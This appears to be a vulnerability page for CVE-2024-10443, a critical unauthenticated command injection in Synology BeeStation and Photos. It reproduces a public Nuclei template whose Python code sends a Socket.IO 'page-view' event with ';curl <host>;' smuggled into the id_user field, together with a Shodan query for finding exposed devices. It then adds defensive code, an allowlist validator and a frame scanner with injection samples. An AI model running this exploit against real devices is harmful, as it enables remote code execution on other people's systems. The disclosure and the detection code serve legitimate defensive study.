CVE-2024-10443: Synology BeeStation BST150-4T - Unauthenticated Command Injection

Date: 2025-08-01 | Affected software: Synology BeeStation BST150-4T | PoC: public

Vulnerability description

Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.

PoC code [public]

id: CVE-2024-10443

info:
  name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
  reference:
    - https://www.synology.com/en-us/security/advisory/Synology_SA_24_18
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10443
    cwe-id: CWE-77
    epss-score: 0.69894
    epss-percentile: 0.98624
    cpe: cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: synology
    product: photos
    framework: diskstation_manager
    shodan-query: html:"BeeStation"
  tags: unauth,synology,rce,websocket,diskstation

variables:
  OAST: "{{interactsh-url}}"

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei

    source: |
        import websocket,os,json # pip install websocket-client
        url = "ws://"+os.getenv('Hostname')+"/FotoSocketIo/socket.io/?transport=websocket&EIO=4"
        ws = websocket.create_connection(url)
        initial = ws.recv()
        ws.send("40")
        response = ws.recv()
        payload = {
            "id_user": ";curl "+os.getenv('OAST')+";",
            "timestamp": 0,
            "location": "xxd"
        }
        event_message = f'42["page-view",{json.dumps(payload)}]'
        ws.send(event_message)
        ws.close()

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
# digest: 4a0a0047304502200c520e0378568db2d7924f230807017beef1733f4f9d720642a47ceaf367ced00221009a3738866903e35ff9f1db4665839ee7e83b7bee716a06c186eeb0c499569b3f:922c64590222798bb761d5b6d8e72950
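The template above reaches the vulnerable Task Manager component through a Socket.IO event ("page-view") whose `id_user` field carries shell metacharacters. From the defender's side, the two things worth having in code are (a) an allowlist check of the kind that actually neutralizes such a field before it can reach a command, and (b) detection logic that inspects Socket.IO event frames for metacharacters so a proxy or log pipeline can flag attempts. The following is an added example written for this page, not Synology's code and not part of the Nuclei template; the function names (`parse_event`, `suspicious_fields`, `inspect_frame`, `is_safe_id_user`), the metacharacter set and the sample frames are assumptions constructed here.

```python
import json
import re

# A Socket.IO event frame is Engine.IO packet type "4" (message) followed by
# Socket.IO packet type "2" (event), i.e. the text prefix "42", then a JSON
# array: [event_name, payload, ...].
EVENT_PREFIX = "42"

# Characters that change the meaning of a string spliced into a shell command.
# Assumption: this set is what we consider worth flagging; extend as needed.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")

# Allowlist for a user identifier. Validating against an allowlist (or never
# passing the value through a shell at all) is the fix for CWE-77 class bugs.
ALLOWED_ID = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def is_safe_id_user(value):
    """Return True only if value is a string matching the allowlist."""
    return isinstance(value, str) and bool(ALLOWED_ID.match(value))


def parse_event(frame):
    """Return (event_name, payload) for a '42[...]' frame, else None."""
    if not frame.startswith(EVENT_PREFIX):
        return None
    try:
        body = json.loads(frame[len(EVENT_PREFIX):])
    except json.JSONDecodeError:
        return None
    if not isinstance(body, list) or not body or not isinstance(body[0], str):
        return None
    payload = body[1] if len(body) > 1 else None
    return body[0], payload


def suspicious_fields(payload):
    """Recursively collect (path, value) pairs whose string contains shell metacharacters."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, val in node.items():
                walk(val, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for idx, val in enumerate(node):
                walk(val, f"{path}[{idx}]")
        elif isinstance(node, str) and SHELL_META.search(node):
            hits.append((path, node))

    walk(payload, "")
    return hits


def inspect_frame(frame):
    """Return a finding dict for a frame whose payload looks like injection, else None."""
    parsed = parse_event(frame)
    if parsed is None:
        return None
    name, payload = parsed
    hits = suspicious_fields(payload)
    if not hits:
        return None
    return {"event": name, "fields": hits}


def scan(frames):
    """Run inspect_frame over an iterable of frames and keep the findings."""
    return [f for f in (inspect_frame(x) for x in frames) if f]


# Constructed sample frames for demonstration; not captured traffic.
SAMPLE_FRAMES = [
    "40",
    '42["page-view",{"id_user":"alice","timestamp":0,"location":"album"}]',
    '42["page-view",{"id_user":";curl oast.example;","timestamp":0,"location":"xxd"}]',
    '42["page-view",{"id_user":"bob","timestamp":0,"location":"$(id)"}]',
    '42["ping",1]',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_FRAMES):
        print(finding)
```

The allowlist rejects the injected `id_user` outright, which is the correct server-side fix; the frame scanner is a coarse network-side signal only (it will also flag legitimate free-text fields containing `&` or `$`), so treat it as a triage hint rather than a blocking rule.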